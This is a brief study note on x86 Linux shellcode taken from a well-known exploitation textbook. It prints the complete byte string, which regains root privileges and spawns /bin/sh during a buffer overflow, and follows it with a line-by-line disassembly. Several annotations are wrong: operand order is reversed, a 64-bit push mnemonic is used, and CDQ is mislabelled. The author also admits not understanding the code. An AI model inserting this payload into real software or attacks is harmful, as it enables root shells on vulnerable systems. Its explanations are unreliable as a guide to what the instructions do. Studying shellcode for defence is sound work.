/*register ids:
eax = 0 = 000
ecx = 1 = 001
edx = 2 = 010
ebx = 3 = 011
esp = 4 = 100
ebp = 5 = 101
esi = 6 = 110
edi = 7 = 111*/
shellcode: \x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80
from "Hacking - The Art of Exploitation", in source file "exploit_notesearch.c". This is used in a buffer overflow to spawn a shell.
OPCODE MNEMO SRC DEST
\x31 \xc0 XOR %eax, %eax ;clearing all registers
\x31 \xdb XOR %ebx, %ebx
\x31 \xc9 XOR %ecx, %ecx
\x99 CWD %ax, %dx ;convert word to doubleword / doubleword to quadword
\xb0 \xa4 MOV $0xa4, %al
\xcd \x80 INT $0x80 ;call to interrupt procedure
\x6a \x0b PUSH $0xb ;push 0xb onto stack (8bit)
\x58 POP %eax ;opcodes 58+r (r->register id)
\x51 PUSH %ecx ;push word/doubleword onto stack. (opcode is listed as 50+r)
\x68 \x2f \x2f \x73 \x68 PUSHQ $0x68732f2f
\x68 \x2f \x62 \x69 \x6e PUSHQ $0x6e69622f
\x89 \xe3 MOV %ebx, %esp
\x51 PUSH %ecx
\x89 \xe2 MOV %edx, %esp
\x53 PUSH %ebx
\x89 \xe1 MOV %ecx, %esp
\xcd \x80 INT $0x80 ;interrupt again
//still don't know what the fuck this does